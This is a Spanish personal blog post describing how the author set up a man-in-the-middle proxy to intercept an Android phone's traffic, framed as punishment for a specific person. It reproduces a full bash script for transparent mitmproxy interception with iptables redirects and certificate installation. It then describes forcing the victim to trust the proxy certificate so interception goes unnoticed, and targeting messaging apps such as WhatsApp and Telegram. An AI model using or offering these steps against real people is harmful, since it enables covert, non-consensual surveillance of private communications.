Sábado, 20 de Febrero de 2021: Android MITM

Una mala persona de color amarillo necesitaba un escarmiento.

Interceptar información de un celular es algo bastante sencillo, sobre todo si es Android (¡yiuck!, Android).

Para la prueba, podemos usar un celular virtualizado. Se puede usar Genymotion o Android Studio, o si eres rico Corellium.

Luego use directamente el script para MITMproxy de Ring Zero Labs.

Bash script to setup MITMProxy on Kali Linux

Setup forwarding vars

sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -w net.ipv6.conf.all.forwarding=1
sudo sysctl -w net.ipv4.conf.all.send_redirects=0

Ensure the MITM User is added and pip is installed

sudo apt-get install pip
sudo useradd --create-home mitmproxyuser
sudo -u mitmproxyuser -H bash -c 'cd ~ && pip install --user mitmproxy'

Setup Routing

sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080
sudo ip6tables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 80 -j REDIRECT --to-port 8080
sudo ip6tables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser --dport 443 -j REDIRECT --to-port 8080

Install Root Certificates

openssl x509 -in ~/.mitmproxy/mitmproxy-ca-cert.cer -inform PEM -out ~/.mitmproxy/mitm.crt
sudo mkdir -p /usr/share/ca-certificates/extra
sudo cp ~/.mitmproxy/mitm.crt /usr/share/ca-certificates/extra/mitm.crt
sudo cp ~/.mitmproxy/mitm.crt /usr/local/share/ca-certificates/mitm.crt
sudo dpkg-reconfigure ca-certificates # Interactive

Start the mitmweb service. Go to 127.0.0.1:8081 in browser

sudo -u mitmproxyuser -H bash -c 'mitmweb --mode transparent --showhost --set block_global=false' &

Wait a few seconds for the mitmproxy to start

sleep 5

Open firefox to the mitmproxy browser page

which firefox http://127.0.0.1:8081 &

El script instala todo lo necesario y lanza el visor del MITM en Firefox; y empieza a interceptar el tráfico (la IP va a variar ya cuando estén interceptando la información de un dispositivo real)

Entre las cosas que instala son paquetes para poder gestionar correctamente los certificados.

Y chachán…

Hay un tema, y puede que en algunos casos aparezcan mensajes de alerta por el certificado autofirmado del proxy; así que para eso es posible forzar al usuario a instalar el certificado de MITMProxy, para hacerlo transparente.

Y podemos revisar que entonces todo es transparente y el usuario no se dará cuenta de que esta siendo interceptado.

Obvio interceptar el navegador no es suficiente, sino también lo que se envía por las aplicaciones; mensajería como Whatsapp, Messenger, Telegram y otra información enviada.

Aquí instalo una aplicación de prueba para verificarlo.

Una vez instalada verificamos que podamos también interceptar la información.

Si una Scarlett escupe su manita suavecita y promete algo, ten por seguro; que no importa que haya una pandemia mundial, un apocalípsis zombie, que todo este en chino y alemán… una Scarlett siempre va a cumplir su promesa

😠😡🤬

0 comentarios en “Sábado, 20 de Febrero de 2021: Android MITMAñade los tuyos →

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *